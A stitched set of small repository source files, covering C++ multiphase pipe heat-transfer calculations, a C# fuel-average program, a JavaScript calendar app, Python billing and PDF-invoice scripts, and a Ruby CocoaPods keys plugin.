(pow(T * 9.0 / 5.0, 3.825))));
}
//Checked
double FluidProperties::Gas::Cp(FluidProperties &container)
{
this->container = &container;
Render();
double TF = (9.0 / 5.0)*(T - 273.15) + 32;
return(8.2976*0.1*TF + 2.2822 * 1000);
}
//Checked
double FluidProperties::Gas::Rho(FluidProperties &container) // [kg / m3]
{//[J/kg/K]
this->container = &container;
double ans;
Render();
double Ppsi = P / 6894.7572932;
double R = 10.7316;//psi.ft3/mol/R
double TR = T * 9.0 / 5.0;//Rankin
ans = Z(container);
return(Ppsi*MW / (Z(container)*R*TR) / 62.4279606 * 1000);
}
//Not prefered, use RhoG instead
double FluidProperties::Gas::Rho2(FluidProperties &container)
{
this->container = &container;
Render();
double TF = (9.0 / 5.0)*(T - 273.15) + 32;
return(-4.3*0.01*TF + 2.23 * 10);
}
//Checked
double FluidProperties::Gas::Mu(FluidProperties &container)
{//[kg/(m s)]
this->container = &container;
Render();
double TR = T * 9.0 / 5.0;//Rankin
double X = 3.448 + 986.4 / (TR)+0.01009*MW;
double Y = 2.447 - 0.2224*X;
double K = (9.379 + 0.01607*MW)*pow(TR, 1.5) / (209.2 + 19.26*MW + TR);
double ans = pow(10, -7.0)*K*exp(X*pow(Rho(container)*0.001, Y));
return(ans);
}
double FluidProperties::Gas::K(FluidProperties &container)
{
double TF = (9.0 / 5.0)*(T - 273.15) + 32;
return(5.963*pow(10, -5)*TF + 3.2221*0.01);
}
}//usr
<file_sep>/*In this cpp file, different fluid properties are
calculated based on temperature and pressure*/
//Glycol properties are not included
//Properties of gas and oil are listed here
#include "StratifiedFlowGeometry.h" //It provides hydraulic parameters of both phases
#include "CaseSpecificInputs.h" //Pipe and fluid properties
#include <iostream>
#include <cmath>
using namespace std;
SFConstWallTemp::SFConstWallTemp(double Length, double SuperVelocityGas,
double SuperVelocityLiquid, double LiqHoldUp,
double TempWall, double TempInlet, double Pressure)
{
L = Length, TW = TempWall; TLI = TempInlet; VSG = SuperVelocityGas;
VSL = SuperVelocityLiquid; P = Pressure; h = LiqHoldUp;
}
void SFConstWallTemp::Liquid::SetContainer(SFConstWallTemp &container)
{
this->container = &container;
}
void SFConstWallTemp::Liquid::Render(void)
{
VSL = container->VSL;
L = container->L;
TW = container->TW;
TLI = container->TLI;
P = container->P;
h = container->h;
}
double SFConstWallTemp::Liquid::Nu(double T, SFConstWallTemp &container) {
this->container = &container;
Render();
PipeGeometry PipeGeometry;
// Temp and pressure are needed for properties class
FluidProperties Properties(T, P);
StratifiedFlowGeometry FlowGeo(h);
ID = PipeGeometry.IDPipe;
double ans;
double AL = (FlowGeo.ALTilt)*ID*ID;
double dL = pow(AL * 4 / Pi, 0.5);
double Rho = Properties.Liquid.Rho(Properties);
double Mu = Properties.Liquid.Mu(Properties);
double Cp = Properties.Liquid.Cp(Properties);;
double K = 0.15;//For now ******
double VS = VSL / h;
double Re = dL * VS*Rho / Mu;
double Pr = Cp * Mu / K;
ans = 0.023*pow(Re, 0.8)*pow(Pr, 1.0 / 3.0);
return(ans);
}
double SFConstWallTemp::Liquid::TempProfile(SFConstWallTemp &container) {
this->container = &container;
Render();
StratifiedFlowGeometry FlowGeo(h);
PipeGeometry PipeGeometry;
ID = PipeGeometry.IDPipe;
double X = L / 200.0;
double hAverage;
double NuL;
double T = TLI;
double CP;
double RHO;
double SL = FlowGeo.SLTilt*ID;
double AL = (FlowGeo.ALTilt)*ID*ID;
double dL = pow(AL * 4 / Pi, 0.5);
double W;
double TLO = T - 5;//Initial guess
double F, Fdx, Fprime;
double dx = 0.0000001;
double Eps = 10;
for (int i = 0; i < 200; i++) {
//This while basically does NR
while (Eps > 10E-12) {
FluidProperties Properties(T, P);
CP = Properties.Liquid.Cp(Properties);
RHO = Properties.Liquid.Rho(Properties);
W = (VSL / h)*AL*RHO;
NuL = Nu(T, container);
hAverage = NuL * 0.15 / dL;
F = hAverage * SL*X*((TW - T) - (TW - TLO)) / log((TW - T) /
(TW - TLO)) - W * CP*(TLO - T);
Eps = F;
Fdx = hAverage * SL*X*((TW - T) - (TW - (TLO + dx))) /
log((TW - T) / (TW - (TLO + dx))) - W * CP*((TLO + dx) - T);
Fprime = (Fdx - F) / dx;
TLO = TLO - F / Fprime;
}
T = TLO;
cout << TLO << endl;
TLO = T - 1;
Eps = 10;
}
return(TLO);
}
void SFConstWallTemp::Gas::SetContainer(SFConstWallTemp &container)
{
this->container = &container;
}
void SFConstWallTemp::Gas::Render(void)//
{
VSG = container->VSG;
L = container->L;
TW = container->TW;
TLI = container->TLI;
P = container->P;
h = container->h;
}
double SFConstWallTemp::Gas::Nu(double T, SFConstWallTemp &container) {
this->container = &container;
Render();
PipeGeometry PipeGeometry;
// Temp and pressure are needed for properties class
FluidProperties Properties(T, P);
StratifiedFlowGeometry FlowGeo(h);
ID = PipeGeometry.IDPipe;
double ans;
double AG = (FlowGeo.AGTilt)*ID*ID;
double dG = pow(AG * 4 / Pi, 0.5);
double Rho = Properties.Gas.Rho(Properties);
double Mu = Properties.Gas.Mu(Properties);
double Cp = Properties.Gas.Cp(Properties);
double K = 0.035854;//For now ******
double VG = VSG / h;
double Re = dG * VG*Rho / Mu;
double Pr = Cp * Mu / K;
ans = 0.023*pow(Re, 0.8)*pow(Pr, 1.0 / 3.0);
return(ans);
}
double SFConstWallTemp::Gas::TempProfile(SFConstWallTemp &container) {
this->container = &container;
Render();
StratifiedFlowGeometry FlowGeo(h);
PipeGeometry PipeGeometry;
ID = PipeGeometry.IDPipe;
double X = L / 200.0;
double hAverage;
double NuG;
double T = TLI;
double CP;
double RHO;
double SG = FlowGeo.SGTilt*ID;
double AG = (FlowGeo.AGTilt)*ID*ID;
double dG = pow(AG * 4 / Pi, 0.5);
double W;
double TLO = T - 5;//Initial guess
double F, Fdx, Fprime;
double dx = 0.0000001;
double Eps = 10;
for (int i = 0; i < 200; i++) {
//This while basically does NR
while (Eps > 10E-12) {
FluidProperties Properties(T, P);
CP = Properties.Gas.Cp(Properties);
RHO = Properties.Gas.Rho(Properties);
W = (VSG / h)*AG*RHO;
NuG = Nu(T, container);
hAverage = NuG * 0.15 / dG;
F = hAverage * SG*X*((TW - T) - (TW - TLO)) / log((TW - T) /
(TW - TLO)) - W * CP*(TLO - T);
Eps = F;
Fdx = hAverage * SG*X*((TW - T) - (TW - (TLO + dx))) /
log((TW - T) / (TW - (TLO + dx))) - W * CP*((TLO + dx) - T);
Fprime = (Fdx - F) / dx;
TLO = TLO - F / Fprime;
}
T = TLO;
cout << TLO << endl;
TLO = T - 1;
Eps = 10;
}
return(TLO);
}
SFConstHeatFlux::
SFConstHeatFlux(double Length, double SuperVelocityGas,
double SuperVelocityLiquid, double LiqHoldUp,
double InitialTempWall, double TempInlet, double Pressure)
{
L = Length, TW = InitialTempWall; TLI = TempInlet; VSG = SuperVelocityGas;
VSL = SuperVelocityLiquid; P = Pressure; h = LiqHoldUp;
}
void SFConstHeatFlux::Liquid::SetContainer(SFConstHeatFlux &container)
{
this->container = &container;
}
void SFConstHeatFlux::Liquid::Render(void)
{
VSL = container->VSL;
L = container->L;
TWI = container->TW;
TLI = container->TLI;
P = container->P;
h = container->h;
}
double SFConstHeatFlux::Liquid::Nu(double T, SFConstHeatFlux &container) {
this->container = &container;
Render();
PipeGeometry PipeGeometry;
// Temp and pressure are needed for properties class
FluidProperties Properties(T, P);
StratifiedFlowGeometry FlowGeo(h);
ID = PipeGeometry.IDPipe;
double ans;
double AL = (FlowGeo.ALTilt)*ID*ID;
double dL = pow(AL * 4 / Pi, 0.5);
double Rho = Properties.Liquid.Rho(Properties);
double Mu = Properties.Liquid.Mu(Properties);
double Cp = Properties.Liquid.Cp(Properties);;
double K = 0.15;//For now ******
double VS = VSL / h;
double Re = dL * VS*Rho / Mu;
double Pr = Cp * Mu / K;
ans = 0.023*pow(Re, 0.8)*pow(Pr, 1.0 / 3.0);
return(ans);
}
double SFConstHeatFlux::Liquid::TempProfile(SFConstHeatFlux &container) {
this->container = &container;
Render();
StratifiedFlowGeometry FlowGeo(h);
PipeGeometry PipeGeometry;
ID = PipeGeometry.IDPipe;
//This is one of the assumptions of constant heat flux approach
double ConstTwTo = TWI - TLI;
double X = L / 200.0;
double hAverage;
double NuL;
double T = TLI;
double AL = (FlowGeo.ALTilt)*ID*ID;
double dL = pow(AL * 4 / Pi, 0.5);
double TW = TWI;
double CP;
double RHO;
double SL = FlowGeo.SLTilt*ID;
double W;
double ans;
for (int i = 0; i < 200; i++) {
FluidProperties Properties(T, P);
CP = Properties.Liquid.Cp(Properties);
RHO = Properties.Liquid.Rho(Properties);
W = (VSL / h)*AL*RHO;
NuL = Nu(T, container);
hAverage = NuL * 0.15 / dL;
ans = hAverage * SL*X*ConstTwTo / (W*CP);
// Plus sign here, I am not so sure!!
T = T + hAverage * SL*X*ConstTwTo / (W*CP);
TW = T + ConstTwTo;
cout << T << " " << TW << endl;
}
return(T);
}
void SFConstHeatFlux::Gas::SetContainer(SFConstHeatFlux &container)
{
this->container = &container;
}
void SFConstHeatFlux::Gas::Render(void)
{
VSG = container->VSG;
L = container->L;
TWI = container->TW;
TLI = container->TLI;
P = container->P;
h = container->h;
}
double SFConstHeatFlux::Gas::Nu(double T, SFConstHeatFlux &container) {
this->container = &container;
Render();
PipeGeometry PipeGeometry;
// Temp and pressure are needed for properties class
FluidProperties Properties(T, P);
StratifiedFlowGeometry FlowGeo(h);
ID = PipeGeometry.IDPipe;
double ans;
double AG = (FlowGeo.AGTilt)*ID*ID;
double dG = pow(AG * 4 / Pi, 0.5);
double Rho = Properties.Gas.Rho(Properties);
double Mu = Properties.Gas.Mu(Properties);
double Cp = Properties.Gas.Cp(Properties);;
double K = 0.035854;//For now ******
double VG = VSG / h;
double Re = dG * VG*Rho / Mu;
double Pr = Cp * Mu / K;
ans = 0.023*pow(Re, 0.8)*pow(Pr, 1.0 / 3.0);
return(ans);
}
double SFConstHeatFlux::Gas::TempProfile(SFConstHeatFlux &container) {
this->container = &container;
Render();
StratifiedFlowGeometry FlowGeo(h);
PipeGeometry PipeGeometry;
ID = PipeGeometry.IDPipe;
//This is one of the assumptions of constant heat flux approach
double ConstTwTo = TWI - TLI;
double X = L / 200.0;
double hAverage;
double NuG;
double T = TLI;
double AG = (FlowGeo.AGTilt)*ID*ID;
double dG = pow(AG * 4 / Pi, 0.5);
double TW = TWI;
double CP;
double RHO;
double SG = FlowGeo.SGTilt*ID;
double W;
double ans;
for (int i = 0; i < 200; i++) {
FluidProperties Properties(T, P);
CP = Properties.Gas.Cp(Properties);
RHO = Properties.Gas.Rho(Properties);
W = (VSG / h)*AG*RHO;
NuG = Nu(T, container);
hAverage = NuG * 0.15 / dG;
ans = hAverage * SG*X*ConstTwTo / (W*CP);
// Plus sign here, I am not so sure!!
T = T + hAverage * SG*X*ConstTwTo / (W*CP);
TW = T + ConstTwTo;
cout << T << " " << TW << endl;
}
return(T);
}
<file_sep>#ifndef StratifiedFlowGeometry_H
#define StratifiedFlowGeometry_H
#include<cmath>
#include <iostream>
#include "CaseSpecificInputs.h"
namespace MultiphaseTemperature {
// Geometric relations for stratified gas-liquid flow in a circular pipe.
// Given the liquid height, exposes the wetted perimeters, interface
// width and phase areas used by the heat-transfer model.
// NOTE(review): the *Tilt members appear to be normalized by ID (areas
// by ID^2), as they are multiplied back by ID/ID^2 at the call sites --
// confirm against the implementation.
class StratifiedFlowGeometry {
	//hL should be known. hL is the height of liquid in the pipe
	//Always ID is equal or larger than hL
	double hL;
	double Pi = 3.14159265358979;//Pi number
public:
	// h: liquid height; IDEffective: effective inner pipe diameter.
	StratifiedFlowGeometry(double h, double IDEffective);
	double ID;       // pipe inner diameter
	double A;        // full pipe cross-sectional area
	double hLTilt;   // dimensionless liquid height
	double SGTilt;   // gas-wetted wall perimeter (dimensionless)
	double SLTilt;   // liquid-wetted wall perimeter (dimensionless)
	double SITilt;   // gas-liquid interface width (dimensionless)
	double AGTilt;   // gas-phase area (dimensionless)
	double ALTilt;   // liquid-phase area (dimensionless)
	double dL;       // liquid hydraulic diameter
	double dG;       // gas hydraulic diameter
	double Theta;    // angle subtended by the liquid level
	friend class PipeGeometry;
};
}
#endif
| 52bf49442a5005ac4aba3ce1643caf9795041806 | [
"Markdown",
"C++"
] | 17 | C++ | arajamali/CPP-simulation-for-hydrodynamic-and-heat-transfer-calculations-in-Slug-flow-condition | fb0abae7afc58d9377fe64742649fc5f09cafb68 | 3f8b01e77899869860ddb0abc3cc03a700c02325 |
refs/heads/master | <file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace _29Tanken1._0
{
class Program
{
    // Elias Claeys 5ITN 10/12/2020
    // Reads kilometres driven and litres refuelled per fill-up until the
    // user enters 0 litres, then prints the average litres per fill-up.
    static void Main(string[] args)
    {
        int kilometer, litter;
        int aantal = 0;   // number of fill-ups
        int totaal = 0;   // total litres tanked

        Console.Write("Hoeveel kilometer heb je gereden sinds de vorige tankbeurt ");
        kilometer = int.Parse(Console.ReadLine());
        Console.Write("Hoeveel liter heb je toen getankt ");
        litter = int.Parse(Console.ReadLine());

        while (litter != 0)
        {
            aantal = aantal + 1;
            totaal = totaal + litter;
            Console.Write("Hoeveel kilometer heb je gereden sinds de vorige tankbeurt ");
            kilometer = int.Parse(Console.ReadLine());
            Console.Write("Hoeveel liter heb je toen getankt ");
            litter = int.Parse(Console.ReadLine());
        }

        if (aantal > 0)
        {
            // Fix: integer division truncated the average; cast to double.
            double gemiddelde = (double)totaal / aantal;
            Console.WriteLine($"Het gemiddelde verbruik is {gemiddelde} litter");
        }
        else
        {
            // Fix: dividing by aantal == 0 threw DivideByZeroException when
            // the very first input was 0 litres.
            Console.WriteLine("Geen tankbeurten ingegeven.");
        }

        Console.WriteLine();
        Console.Write("Druk op enter om af te sluiten");
        Console.ReadLine();
    }
}
}
| 5825a08170183111fc9da3647d327d9de4a8af4f | [
"C#"
] | 1 | C# | Eliasclaeys/29Tanken1.0 | 4d16b12917885347a4c38d235e3c7ce72ca46625 | 102a3637f92ec0810ca77d6ea8bb0877300688e6 |
refs/heads/main | <repo_name>janellebaguley/BandCalendar<file_sep>/db/delete_event.sql
delete from cal_event where cal_event_id = $1 and user_id = $2;<file_sep>/server/controller.js
module.exports = {
getEventsDay: async (req, res) => {
const db = req.app.get('db')
await db.get_day(day)
.then(event => res.status(200).send(event))
.catch(err => res.status(500).send(err))
},
getEventsMonth: async (req, res) => {
const db = req.app.get('db')
await db.get_events(month)
.then(event => res.status(200).send(event))
.catch(err => res.status(500).send(err))
},
addEvents: async (req, res) => {
const db = req.app.get('db')
const {title, location, start, end} = req.body
const {user_id} = req.session.user
await db.add_events(user_id, title, location, start, end)
.then(() => res.sendstatus(200))
.catch(err => res.status(500).send(err))
},
editEvent: (req,res) => {
const {id} = req.params
const{title, location} = req.body
const db = req.app.get('db')
db.update_event({id, title, location})
.then(() => res.sendstatus(200))
.catch(err => res.status(500).send(err))
},
searchEvent: (req, res)=> {
const db = req.app.get('db')
const {title, location} = req.body
db.search_events(title, location, group)
.then(() => res.sendstatus(200))
.catch(err => res.status(500).send(err))
},
deleteEvent: (req, res) => {
const {id} = req.params
const db = req.app.get('db')
db.delete_event({id})
.then(() => res.sendstatus(200))
.catch(err => res.status(500).send(err))
},
getSessionUser: (req, res) => {
const {user} =req.session
if(user){
res.send(user)
} else {
res.send('')
}
}
}<file_sep>/db/seed.sql
-- Fix: users must be created BEFORE cal_event, whose user_id column
-- references it; Postgres rejects a REFERENCES clause to a table that
-- does not exist yet.
CREATE TABLE users (
    user_id SERIAL PRIMARY KEY,
    username VARCHAR(250) NOT NULL,
    email VARCHAR(150) NOT NULL,
    password VARCHAR(250) NOT NULL
);

-- One calendar event per row, owned by a user.
CREATE TABLE cal_event (
    cal_event_id SERIAL PRIMARY KEY,
    user_id int references users(user_id),
    cal_event_title VARCHAR(250),
    cal_event_location VARCHAR(150),
    cal_start date,
    cal_end date
);<file_sep>/db/get_day.sql
select * from cal_event where cal_start = $1;<file_sep>/src/Components/Calendar.js
import React, {useState, useReducer, createContext, useCallback} from "react";
import Header from './CalendarHeader';
import DayOfWeek from './DayOfWeek';
import CalendarBody from './CalendarBody';
import DailyEvent from "./DailyEvent";
import {eventScheduler} from '../dux/eventScheduler';
import {getEventsFromLocalStorage} from './Local';
// import axios from 'axios'
export const EventScheduleContext = createContext();
const initialEventSchedule = getEventsFromLocalStorage() || {};
// Root calendar view. Owns today's date, the user-selected date, whether
// the per-day event panel is open, and the event schedule (seeded from
// localStorage at module load, shared to children via EventScheduleContext).
const Calendar = () => {
  const [todaysDate, setTodaysDate] = useState(new Date());
  const [selectedDate, setSelectedDate] = useState(new Date());
  const [eventsView, setEventsView] = useState(false);
  const [eventSchedule, eventScheduleDispatch] = useReducer(eventScheduler, initialEventSchedule);

  // Memoized so day cells do not re-render on every parent render.
  // Clicking a day selects it and opens the daily-event panel.
  const onDateClick = useCallback((day) => {
    setSelectedDate(day);
    setEventsView(true);
  }, []);

  // const getEvents = () => {
  //     axios.get('/api/events', {todaysDate, eventsView})
  //         .then(() => {
  //             setTodaysDate(new Date())
  //             setEventsView(true)
  //         })
  // }

  return (
    <EventScheduleContext.Provider value={{eventSchedule: eventSchedule, eventScheduleDispatch: eventScheduleDispatch}}>
      <div className="calendar">
        <Header currentMonth={selectedDate} setCurrentMonth={setSelectedDate}/>
        <DayOfWeek />
        <CalendarBody currentMonth={selectedDate} todaysDate={todaysDate} onDateClick={onDateClick}/>
        {eventsView &&
          <DailyEvent selectedDate={selectedDate} setEventsView={setEventsView} />
        }
      </div>
    </EventScheduleContext.Provider>
  );
};
export default Calendar; | 122ca231e35f57c0da2065331b0d7fd02f9a02a4 | [
"JavaScript",
"SQL"
] | 5 | SQL | janellebaguley/BandCalendar | 4638d2f5d1d155d19f19afa7129f9a256205e5f0 | 837b092cc1e652269fef6a689f0bbad12db5eade |
refs/heads/master | <repo_name>lyakhovenko/mobile<file_sep>/LR3/LR3.py
from datetime import datetime
import csv
from fpdf import FPDF
PDF_FILE = 'payment.pdf'
def pdf_common_line(pdf, font_size, text):
    """Write *text* as one line and advance the cursor by half the font size."""
    half_height = font_size / 2
    pdf.write(half_height, text)
    pdf.ln(half_height)
def create_pdf(bank_name, inn, kpp, bik, recipient, account_number1, account_number2, doc_number, date, provider,
               customer, reason):
    """Render the payment invoice to PDF_FILE.

    Builds a bank-details header table, the invoice title, provider/customer
    sections, a line-item table (calls, SMS, internet traffic) and the total.

    NOTE(review): besides its parameters this function reads module-level
    globals set by the __main__ block: number, minut_call, sms, s, coat_sms,
    Q, k2, X and sum (which shadows the builtin) -- consider passing them in.
    """
    header = [['Банк получателя: ' + bank_name, 'БИК: ' + bik],
              ["ИНН: " + inn + " " + "КПП: " + kpp, 'Сч. №' + account_number1],
              ['Получатель: ' + recipient, 'Сч. №' + account_number2]]
    pdf = FPDF()
    pdf.add_page()
    # DejaVu fonts are required for Cyrillic text (uni=True).
    pdf.add_font('DejaVu', '', 'DejaVuSansCondensed.ttf', uni=True)
    pdf.add_font('DejaVu', 'B', 'DejaVuSansCondensed-Bold.ttf', uni=True)
    pdf.set_font('DejaVu', '', 12)
    col_width = pdf.w / 2.2
    row_height = pdf.font_size
    spacing = 2
    # Bank-details header: two bordered cells per row.
    for row in header:
        for item in row:
            pdf.cell(col_width, row_height * spacing,
                     txt=item, border=1)
        pdf.ln(row_height * spacing)
    # Invoice title.
    font_size = 16
    pdf.set_font('DejaVu', 'B', font_size)
    pdf.ln(font_size / 2)
    pdf_common_line(pdf, font_size, "Счёт на оплату №{} от {}г.".format(doc_number, date))
    pdf_common_line(pdf, font_size, "_" * 74)
    # Provider / customer / reason section.
    font_size = 12
    pdf.ln(font_size)
    pdf.set_font('DejaVu', '', font_size)
    pdf_common_line(pdf, font_size, "Поставщик")
    pdf_common_line(pdf, font_size, "(Исполнитель): {}".format(provider))
    pdf_common_line(pdf, font_size, "")
    pdf_common_line(pdf, font_size, "Покупатель")
    pdf_common_line(pdf, font_size, "(Заказчик): {}".format(customer))
    pdf_common_line(pdf, font_size, "")
    pdf_common_line(pdf, font_size, "Основание: {}".format(reason))
    pdf_common_line(pdf, font_size, "")
    # Line-item table built from the billing globals.
    font_size = 10
    row_height = pdf.font_size
    pdf.set_font('DejaVu', '', font_size)
    table = [['№', "Товары (работы, услуги)", "Кол-во", "Ед.", "Сумма"]]
    counter = 1
    table.append([str(counter), "Звонок {} мин. ".format(number), "{} шт.".format(minut_call), "{} руб.".format(1), "{} руб.".format(minut_call)])
    counter += 1
    table.append([str(counter), "SMS для {}".format(number), "{} шт.".format(sms), "{} руб.".format(s), "{} руб.".format(coat_sms)])
    counter += 1
    table.append([str(counter), "Интернет трафик (за МБ)", "{} МБ".format(Q+1000), "{} руб.".format(k2),
                  "{} руб.".format(X)])
    table.append(['', "ВСЕГО", '', '', "{} руб.".format(sum)])
    # Column widths are expressed in 18ths of the page width.
    one_part = pdf.w / 18
    for row in table:
        pdf.cell(one_part * 1, row_height * spacing, txt=row[0], border=1)  # number
        pdf.cell(one_part * 8, row_height * spacing, txt=row[1], border=1)  # title
        pdf.cell(one_part * 2, row_height * spacing, txt=row[2], border=1)  # count
        pdf.cell(one_part * 2, row_height * spacing, txt=row[3], border=1)  # cost per one
        pdf.cell(one_part * 3, row_height * spacing, txt=row[4], border=1)  # total cost
        pdf.ln(row_height * spacing)
    # Grand total and footer.
    font_size = 16
    pdf.set_font('DejaVu', 'B', font_size)
    pdf_common_line(pdf, font_size, "Всего к оплате: {} руб.".format(sum))
    pdf_common_line(pdf, font_size, "")
    font_size = 8
    pdf.set_font('DejaVu', '', font_size)
    pdf_common_line(pdf, font_size, "HELLO!")
    pdf_common_line(pdf, font_size,
                    "Оплата данного счёта означает согласие с условиями поставки товара/предоставления услуг.")
    pdf_common_line(pdf, font_size, "")
    font_size = 16
    pdf.set_font('DejaVu', 'B', font_size)
    pdf.ln(font_size / 2)
    pdf_common_line(pdf, font_size, "_" * 74)
    font_size = 12
    pdf.set_font('DejaVu', '', font_size)
    pdf.ln(font_size / 2)
    pdf_common_line(pdf, font_size, "Руководитель " + "_" * 20 + " " * 25 + "Бухгалтер " + "_" * 20)
    pdf.output(name=PDF_FILE, dest='F').encode('utf-8')
if __name__ == "__main__":
    print("== Payment document ==")
    # --- Phone bill: read per-call records from data.csv ------------------
    list_1 = []
    with open('data.csv') as data_file:
        reader = csv.reader(data_file)
        for a in reader:
            list_1.append(a)
    number = '915783624'   # subscriber being billed
    k1 = 1                 # price per billable call minute
    s = 5                  # price per SMS
    minut_call = 0.0       # minutes over the 10-minute free allowance
    coat_sms = 0           # SMS count (later converted to cost)
    # NOTE(review): hard-coded row count -- assumes data.csv has 9 rows.
    for i in range(9):
        if number in list_1[i][1]:
            if float(list_1[i][3]) > 10:
                minut_call += float(list_1[i][3]) - 10.0
                coat_sms += float(list_1[i][4])
            else:
                coat_sms += float(list_1[i][4])
    minut_call = round(minut_call, 2)
    sms = coat_sms               # keep the raw SMS count for the PDF table
    coat_sms = coat_sms * s      # SMS cost
    minut_call = minut_call * k1 # call cost
    # --- Internet traffic bill from dataset.csv ---------------------------
    list_2 = []
    with open('dataset.csv') as data_file:
        reader = csv.reader(data_file)
        for a in reader:
            list_2.append(a)
    k2 = 0.5                     # price per MB over the free limit
    limit = 1000                 # free traffic allowance, MB
    address = '192.168.250.39'   # customer IP address
    Q = 0.0                      # total traffic for this address, MB
    i = 0
    # NOTE(review): hard-coded row count -- verify dataset.csv length.
    for i in range(17449):
        if address in list_2[i][3]:
            Q += float(list_2[i][12])
    Q -= 1000                    # subtract the free allowance (see `limit`)
    X = Q * k2                   # traffic cost
    # Grand total with 20% VAT. NOTE(review): `sum` shadows the builtin.
    sum = X * 1.2 + minut_call * 1.2 + coat_sms * 1.2
    nds = sum * 0.2              # VAT portion (unused downstream)
    print("Creating PDF file...")
    # create_pdf also reads the globals set above (number, sms, Q, X, sum...).
    create_pdf(bank_name="<NAME>", inn='123456173', kpp='00001238', bik='666666', \
               recipient="JULILIY", account_number1="1234591", account_number2="1378923", \
               doc_number="1", date=datetime.now().strftime("%d.%m.%Y"), \
               provider="ООО СВЯЗЬ", customer="JULILIY ({}, {})".format(address, number), reason="ДОЛГ!")
<file_sep>/LR3/README.MD
Лабораторная работа №3. Вариант 14
Для корректного запуска LR3.py в одной папке с программой должны находиться файлы с исходными данными (dataset.csv, data.csv) и два файла шрифтов формата TrueType (представлены в репозитории). Также необходимо программное обеспечение, поддерживающее ЯП Python версии выше 3.
Контакты: <EMAIL>
<file_sep>/LR1/LR1.py
"""LR1: SMS cost and over-allowance call minutes for one phone number.

Reads per-call records from data.csv and writes two numbers to output.txt:
total SMS cost (count * price) and billable call minutes (minutes beyond
the 10-minute free allowance per call, times the per-minute rate).
"""
import csv

number = '915783624'   # subscriber being billed
k = 1                  # price per billable call minute
s = 5                  # price per SMS
FREE_MINUTES = 10.0    # free minutes per call

# Fix: the original called `data_file.close` / `out.close` WITHOUT
# parentheses -- a no-op attribute access, so the files were never closed.
# `with` closes them deterministically.
rows = []
with open('data.csv') as data_file:
    for row in csv.reader(data_file):
        rows.append(row)

minut_call = 0.0
coat_sms = 0
# NOTE(review): the original scanned exactly the first 9 rows; iterating
# every row generalizes to any file length -- assumed equivalent here.
for row in rows:
    if number in row[1]:
        if float(row[3]) > FREE_MINUTES:
            minut_call += float(row[3]) - FREE_MINUTES
        coat_sms += float(row[4])
minut_call = round(minut_call, 2)

out = open('output.txt', 'w')
print(str(coat_sms * s), str(k * minut_call), file=out)
out.close()
out.close<file_sep>/LR2/Readme.md
Лабораторная работа №2. Вариант 14
Для корректного запуска LR2.py в одной папке с программой должен находиться файл с данными трафика (dataset.csv).
Также необходимо программное обеспечение, поддерживающее ЯП Python версии выше 3.
Контакты: <EMAIL>
<file_sep>/LR2/LR2.py
"""LR2: internet-traffic bill for one IP address, plus a traffic plot.

Reads dataset.csv, sums the traffic volume for ADDRESS, charges K per MB
over the free LIMIT, writes the cost to output.txt and shows a plot.
"""
import csv
import matplotlib.pyplot as plt

K = 0.5                      # price per MB over the free limit
LIMIT = 1000                 # free traffic allowance, MB
ADDRESS = '192.168.250.39'   # customer IP address

total = 0.0   # total traffic for this address, MB
x = []        # record timestamps for this address
y = []        # traffic volume per record
# Fix: the original called `data_file.close` / `out.close` WITHOUT
# parentheses -- a no-op, so the files were never closed. Also replaces
# the hard-coded `range(17449)` row count with iteration over the file
# (assumed equivalent -- confirm dataset.csv has no extra rows).
with open('dataset.csv') as data_file:
    for row in csv.reader(data_file):
        if ADDRESS in row[3]:
            total += float(row[12])
            x.append(float(row[2]))
            y.append(float(row[12]))

cost = (total - LIMIT) * K

with open('output.txt', 'w') as out:
    print(cost, file=out)

# NOTE(review): x and y are sorted independently, which destroys the
# pairing between time and volume; behavior kept as in the original --
# confirm the plot is intended to be a sorted-vs-sorted curve.
x.sort()
y.sort()
assert len(x) == len(y)
plt.plot(x, y)
plt.grid(True)
plt.show()
<file_sep>/LR1/Readme.md
Лабораторная работа №1. Вариант 14
Для корректного запуска LR1.py в одной папке с программой должен находиться файл с данными (data.csv).
Также необходимо программное обеспечение, поддерживающее ЯП Python версии выше 3.
Контакты: <EMAIL>
| 6fac3891fea400c98b967f3545ae2cdc6de306db | [
"Markdown",
"Python"
] | 6 | Python | lyakhovenko/mobile | 9df0441c6df201908804843d36fee215060f5b5a | a2f9461cd5b373aff772f7581b8904747d8a1b89 |
refs/heads/master | <repo_name>kArTeL/cocoapods-keys<file_sep>/lib/plugin.rb
require 'cocoapods-core'
# CocoaPods plugin entry point: gathers keys from the OS keychain and
# generates an Objective-C `Keys` pod that exposes them to the app target.
module CocoaPodsKeys
  class << self
    def setup
      require 'preinstaller'
      PreInstaller.new(user_options).setup

      # Move our podspec in to the Pods directory.
      # Fix: Dir.exists? was deprecated and removed in Ruby 3.2;
      # Dir.exist? is the supported spelling.
      `mkdir Pods/CocoaPodsKeys` unless Dir.exist? "Pods/CocoaPodsKeys"
      podspec_path = File.join(__dir__, "../templates", "Keys.podspec.json")
      `cp "#{podspec_path}" Pods/CocoaPodsKeys`

      # Get all the keys for this project's keyring.
      local_user_options = user_options || {}
      project = local_user_options.fetch("project") { CocoaPodsKeys::NameWhisperer.get_project_name }
      keyring = KeyringLiberator.get_keyring_named(project) || KeyringLiberator.get_keyring(Dir.getwd)
      raise Pod::Informative, "Could not load keyring" unless keyring

      # Create the .h & .m files in the same folder as the podspec.
      key_master = KeyMaster.new(keyring)
      interface_file = File.join("Pods/CocoaPodsKeys", key_master.name + '.h')
      implementation_file = File.join("Pods/CocoaPodsKeys", key_master.name + '.m')
      File.write(interface_file, key_master.interface)
      File.write(implementation_file, key_master.implementation)

      # Add our template podspec, scoped to a single target when requested.
      if user_options["target"]
        # Renamed the block variable so it no longer shadows the result
        # variable `target` (confusing, flagged by linters).
        wanted_label = "Pods-" + user_options["target"].to_s
        target = podfile.root_target_definitions.map(&:children).flatten.find do |definition|
          definition.label == wanted_label
        end

        if target
          target.store_pod 'Keys', :path => 'Pods/CocoaPodsKeys/'
        else
          puts "Could not find a target named '#{user_options["target"]}' in your Podfile. Stopping Keys.".red
        end
      else
        # Otherwise install Keys globally.
        podfile.pod 'Keys', :path => 'Pods/CocoaPodsKeys/'
      end
    end

    private

    def podfile
      Pod::Config.instance.podfile
    end

    # Plugin options from the Podfile, with keys normalized to strings.
    # CocoaPods has no HashWithIndifferentAccess; see CocoaPods/CocoaPods#3354.
    def user_options
      options = podfile.plugins["cocoapods-keys"]
      options.inject({}) do |normalized_hash, (key, value)|
        normalized_hash[key.to_s] = value
        normalized_hash
      end
    end
  end
end
